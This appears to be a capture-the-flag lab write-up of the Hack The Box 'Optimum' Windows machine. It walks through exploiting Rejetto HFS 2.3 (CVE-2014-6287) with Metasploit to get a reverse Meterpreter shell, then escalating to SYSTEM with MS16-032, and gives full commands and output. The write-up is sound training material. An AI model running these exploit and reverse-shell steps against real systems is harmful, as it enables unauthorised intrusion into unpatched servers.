Optimum
Optimum is a Windows Server 2012 R2 machine running an outdated HTTP file server on port 80. The attack involves two stages - initial foothold through a well-known Remote Code Execution vulnerability in Rejetto HttpFileServer 2.3 (CVE-2014-6287), followed by a local privilege escalation using MS16-032 - a race condition in the Windows Secondary Logon service - to climb from a low-privilege user to NT AUTHORITY\SYSTEM.
1
2
3
4
5
6
7
8
9
10
Nmap → Port 80 (HFS 2.3)
→ searchsploit confirms CVE-2014-6287 (RCE)
→ MSF rejetto_hfs_exec
→ Null byte injection → HFS macro RCE
→ Meterpreter shell as OPTIMUM\kostas
→ user.txt (kostas\Desktop)
→ sysinfo: Server 2012 R2 x64, session x86
→ MS16-032 (secondary logon race condition)
→ Token impersonation → SYSTEM
→ root.txt (Administrator\Desktop)
Reconnaissance
Full port scan with service detection:
1
2
3
4
5
6
7
8
9
10
11
12
Nmap scan report for 10.129.16.230
Host is up, received echo-reply ttl 127 (0.17s latency).
Scanned at 2026-06-12 14:50:15 EAT for 389s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 HttpFileServer httpd 2.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: HFS /
|_http-server-header: HFS 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Only a single port open - port 80 running Rejetto HttpFileServer (HFS) 2.3. HFS is a lightweight personal file-sharing application typically used for quick file transfers.
Visiting http://10.129.16.230 in the browser confirms an empty HFS instance. The web UI leaks additional detail in the Server information panel: version HttpFileServer 2.3 and server uptime. No credentials are required to browse the interface - it’s wide open with anonymous access.
This version number is a critical detail. Check public exploits:
1
2
3
4
5
6
7
8
➜ searchsploit HttpFileServer
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
You get a single hit and it’s an RCE. HFS 2.3 is vulnerable to CVE-2014-6287, a null byte injection flaw in the search macro functionality that allows unauthenticated command execution through a crafted HTTP request.
Foothold - CVE-2014-6287 (Rejetto HFS RCE)
Load the Metasploit module:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
msf > search HttpFileServer
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SRVSSL false no Negotiate SSL/TLS for local server connections
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.2.118 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Before configuring, take note of the module options. Unlike typical HTTP exploits, this module spins up a local HTTP server (
SRVPORT 8080) to serve the payload - the exploit works by injecting a macro into HFS that causes the server to make a callback to your machine and download the payload. It’s a two-stage delivery: the initial HTTP request triggers HFS to fetch your payload, which then executes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf exploit(windows/http/rejetto_hfs_exec) > setg RHOSTS 10.129.16.230
RHOSTS => 10.129.16.230
msf exploit(windows/http/rejetto_hfs_exec) > setg LHOST tun0
LHOST => tun0
msf exploit(windows/http/rejetto_hfs_exec) > check
[*] 10.129.16.230:80 - The service is running, but could not be validated.
msf exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.15.192:4444
[*] Using URL: http://10.10.15.192:8080/icTmyHUu
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /icTmyHUu
[*] Sending stage (199238 bytes) to 10.129.16.230
[!] Tried to delete %TEMP%\kEeZkjfapPPOsL.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.15.192:4444 -> 10.129.16.230:49162) at 2026-06-12 15:09:48 +0300
[*] Server stopped.
The exploit flow is as follows:
1
2
3
4
5
malicious request hits HFS
--> HFS macro evaluates the injected command
--> HFS fetches the payload from your local HTTP server
--> payload executes
--> Meterpreter callback.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter > pwd
C:\Users\kostas\Desktop
meterpreter > ls
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2026-06-19 00:07:53 +0300 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 14:57:16 +0300 desktop.ini
100777/rwxrwxrwx 760320 fil 2017-03-18 15:11:17 +0300 hfs.exe
100444/r--r--r-- 34 fil 2026-06-18 23:47:31 +0300 user.txt
meterpreter > cat user.txt
ac2c621c8a1a02501b1729a83df82070
We’re in but as a standard user account (OPTIMUM\kostas).
Privilege Escalation - MS16-032
Before blindly throwing exploits at the box, enumerate the environment:
1
2
3
4
5
6
7
8
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows Server 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
Two critical details jump out here.
- First, the OS is Windows Server 2012 R2 Build 9600 - a version with a well-known catalogue of local privesc vulnerabilities if unpatched.
- Second, and importantly: the Meterpreter session is x86 (32-bit) running on a 64-bit OS. This architecture mismatch matters as some exploits and post-exploitation modules will behave unexpectedly or fail outright in this configuration.
The MS16-032 module handles this gracefully by using SysWOW64 PowerShell, but it’s worth flagging.
Background the session and search for local privilege escalation modules:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/http/rejetto_hfs_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows OPTIMUM\kostas @ OPTIMUM 10.10.15.192:4444 -> 10.129.16.230:49162 (10.129.16.230)
msf exploit(windows/http/rejetto_hfs_exec) > search exploit/windows/local
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
//// REDACTED ///
45 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation
From the list, ms16_032_secondary_logon_handle_privesc stands out as a strong candidate for Server 2012 R2. MS16-032 is a race condition vulnerability in the Windows Secondary Logon Service (seclogon). When multiple threads compete for a handle to a privileged process, an attacker can win the race and steal a SYSTEM-level impersonation token. Microsoft patched it in March 2016 . Any unpatched 2012 R2 system is likely vulnerable.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf exploit(windows/http/rejetto_hfs_exec) > use 45
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > check
[+] Compressed size: 1160
[+] Deleted
[*] The service is running, but could not be validated.
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
Watch the exploit output - it’s verbose and show what’s happening under the hood:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 10.10.15.192:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\VCmKZZXfY.ps1...
[*] Compressing script contents...
[+] Compressed size: 3828
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2540
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $fcq = [Ntdll]::NtImpersonateThread($qylV, $qylV, [ref]$g48)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (g48:VariablePath) [], Runtime
Exception
+ FullyQualifiedErrorId : NonExistingVariableReference
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $fcq = [Advapi32]::DuplicateToken($dq9, 2, [ref]$ce72)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
u00dmSpFEk0P9HHoC46S2CODrlFe7k6k
[+] Executed on target machine.
[*] Sending stage (199238 bytes) to 10.129.16.230
[*] Meterpreter session 2 opened (10.10.15.192:4444 -> 10.129.16.230:49163) at 2026-06-12 15:26:01 +0300
[+] Deleted C:\Users\kostas\AppData\Local\Temp\VCmKZZXfY.ps1
meterpreter >
The exploit writes a PowerShell script to the user’s temp directory, executes it, and races to duplicate a SYSTEM token before the handle is cleaned up. The PowerShell errors about NtImpersonateThread and DuplicateToken mid-output look alarming, but they’re part of the expected race condition behaviour - the exploit retries and ultimately wins. Session 2 opens.
1
2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
SYSTEM achieved. Navigate to the Administrator desktop for the root flag:
1
2
3
4
5
meterpreter > pwd
C:\Users
meterpreter > cat Administrator\\Desktop\\root.txt
2784db6250b7ab5742f4102db280ba98
meterpreter >